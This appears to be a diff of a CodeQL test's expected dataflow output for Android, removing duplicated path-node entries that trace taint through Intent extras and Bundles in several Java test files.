@@ -3451,21 +2678,17 @@ nodes | Test.java:825:16:825:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:825:24:825:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:826:4:826:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:826:4:826:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:826:36:826:37 | in : String | semmle.label | in : String | | Test.java:827:9:827:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:827:19:827:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:827:36:827:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:827:36:827:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:832:19:832:37 | (...)... : ArrayList | semmle.label | (...)... : ArrayList | | Test.java:832:30:832:37 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:833:4:833:6 | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:833:4:833:6 | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:833:42:833:43 | in : ArrayList | semmle.label | in : ArrayList | | Test.java:834:9:834:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:834:21:834:41 | getIntent_extras(...) 
: Bundle [] : ArrayList | semmle.label | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:834:38:834:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:834:38:834:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:839:16:839:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:839:24:839:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:840:10:840:11 | in : Intent | semmle.label | in : Intent | 
@@ -3474,21 +2697,17 @@ nodes | Test.java:846:16:846:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:846:24:846:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:847:4:847:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:847:4:847:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:847:32:847:33 | in : String | semmle.label | in : String | | Test.java:848:9:848:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:848:19:848:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:848:36:848:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:848:36:848:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:853:19:853:37 | (...)... : ArrayList | semmle.label | (...)... : ArrayList | | Test.java:853:30:853:37 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:854:4:854:6 | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:854:4:854:6 | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:854:38:854:39 | in : ArrayList | semmle.label | in : ArrayList | | Test.java:855:9:855:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:855:21:855:41 | getIntent_extras(...) 
: Bundle [] : ArrayList | semmle.label | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:855:38:855:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:855:38:855:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:860:16:860:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:860:24:860:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:861:10:861:11 | in : Intent | semmle.label | in : Intent | 
@@ -3498,22 +2717,18 @@ nodes | Test.java:867:24:867:52 | newBundleWithMapKey(...) : Bundle [] : String | semmle.label | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:867:44:867:51 | source(...) : String | semmle.label | source(...) : String | | Test.java:868:4:868:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:868:4:868:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:868:22:868:23 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:869:9:869:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:874:16:874:54 | (...)... : Bundle [] : Object | semmle.label | (...)... : Bundle [] : Object | | Test.java:874:24:874:54 | newBundleWithMapValue(...) : Bundle [] : Object | semmle.label | newBundleWithMapValue(...) : Bundle [] : Object | | Test.java:874:46:874:53 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:875:4:875:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | -| Test.java:875:4:875:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | | Test.java:875:22:875:23 | in : Bundle [] : Object | semmle.label | in : Bundle [] : Object | | Test.java:876:9:876:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:876:21:876:41 | getIntent_extras(...) : Bundle [] : Object | semmle.label | getIntent_extras(...) : Bundle [] : Object | | Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | -| Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | | Test.java:881:16:881:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:881:24:881:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:882:10:882:11 | in : Intent | semmle.label | in : Intent | 
@@ -3524,23 +2739,19 @@ nodes | Test.java:888:45:888:73 | newBundleWithMapKey(...) : Bundle [] : String | semmle.label | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:888:65:888:72 | source(...) : String | semmle.label | source(...) : String | | Test.java:889:4:889:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:889:4:889:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:889:22:889:23 | in : Intent [android.content.Intent.extras, ] : String | semmle.label | in : Intent [android.content.Intent.extras, ] : String | | Test.java:890:9:890:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:895:16:895:76 | (...)... : Intent [android.content.Intent.extras, ] : Object | semmle.label | (...)... : Intent [android.content.Intent.extras, ] : Object | | Test.java:895:24:895:76 | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | semmle.label | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | | Test.java:895:45:895:75 | newBundleWithMapValue(...) : Bundle [] : Object | semmle.label | newBundleWithMapValue(...) : Bundle [] : Object | | Test.java:895:67:895:74 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:896:4:896:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | -| Test.java:896:4:896:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | | Test.java:896:22:896:23 | in : Intent [android.content.Intent.extras, ] : Object | semmle.label | in : Intent [android.content.Intent.extras, ] : Object | | Test.java:897:9:897:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:897:21:897:41 | getIntent_extras(...) : Bundle [] : Object | semmle.label | getIntent_extras(...) : Bundle [] : Object | | Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | -| Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | | Test.java:902:16:902:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:902:24:902:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:903:10:903:11 | in : Intent | semmle.label | in : Intent | 
@@ -4250,474 +3461,254 @@ nodes | Test.java:1759:19:1759:20 | in : String | semmle.label | in : String | | Test.java:1760:9:1760:11 | out | semmle.label | out | | TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:18:37:18:64 | (...)... : String | semmle.label | (...)... : String | | TestStartActivityToGetIntent.java:18:46:18:64 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:23:37:23:69 | (...)... : String | semmle.label | (...)... : String | | TestStartActivityToGetIntent.java:23:46:23:69 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | {...} : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | {...} : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | {...} : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | intents : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | intents : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | intents : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| 
TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:29:37:29:71 | (...)... : String | semmle.label | (...)... : String | | TestStartActivityToGetIntent.java:29:46:29:71 | source(...) : Object | semmle.label | source(...) : Object | | TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | {...} : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | {...} : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | {...} : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | intents : Intent[] [[], android.content.Intent.extras, ] : String 
| -| TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | intents : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | intents : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:35:37:35:64 | (...)... : String | semmle.label | (...)... : String | | TestStartActivityToGetIntent.java:35:46:35:64 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:40:37:40:69 | (...)... : String | semmle.label | (...)... : String | | TestStartActivityToGetIntent.java:40:46:40:69 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | {...} : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | {...} : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | {...} : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | intents : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | intents : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | semmle.label | intents : Intent[] [[], android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| 
TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:52:37:52:71 | (...)... : String | semmle.label | (...)... : String | | TestStartActivityToGetIntent.java:52:46:52:71 | source(...) : Object | semmle.label | source(...) : Object | | TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:57:37:57:70 | (...)... : String | semmle.label | (...)... 
: String | | TestStartActivityToGetIntent.java:57:46:57:70 | source(...) : Object | semmle.label | source(...) : Object | | TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:62:37:62:69 | (...)... : String | semmle.label | (...)... : String | | TestStartActivityToGetIntent.java:62:46:62:69 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:67:13:67:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:67:13:67:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:67:13:67:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:67:37:67:71 | (...)... : String | semmle.label | (...)... : String | | TestStartActivityToGetIntent.java:67:46:67:71 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartActivityToGetIntent.java:68:46:68:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:68:46:68:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:68:46:68:51 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:72:13:72:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:72:13:72:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:72:13:72:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:72:37:72:70 | (...)... : String | semmle.label | (...)... : String | | TestStartActivityToGetIntent.java:72:46:72:70 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartActivityToGetIntent.java:73:49:73:54 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:73:49:73:54 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:73:49:73:54 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:79:13:79:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:79:13:79:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:79:13:79:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:79:37:79:60 | (...)... : String | semmle.label | (...)... : String | | TestStartActivityToGetIntent.java:79:46:79:60 | source(...) : Object | semmle.label | source(...) 
: Object | | TestStartActivityToGetIntent.java:80:31:80:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:80:31:80:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:80:31:80:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | semmle.label | getIntent(...) : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | semmle.label | getIntent(...) : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | semmle.label | getIntent(...) : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:95:18:95:51 | getStringExtra(...) | semmle.label | getStringExtra(...) | | TestStartActivityToGetIntent.java:102:18:102:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | semmle.label | getIntent(...) : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:102:18:102:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | semmle.label | getIntent(...) : Intent [android.content.Intent.extras, ] : String | -| TestStartActivityToGetIntent.java:102:18:102:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | semmle.label | getIntent(...) : Intent [android.content.Intent.extras, ] : String | | TestStartActivityToGetIntent.java:102:18:102:51 | getStringExtra(...) 
| semmle.label | getStringExtra(...) | | TestStartBroadcastReceiverToIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:18:37:18:59 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:18:46:18:59 | source(...) : Object | semmle.label | source(...) : Object | | TestStartBroadcastReceiverToIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | 
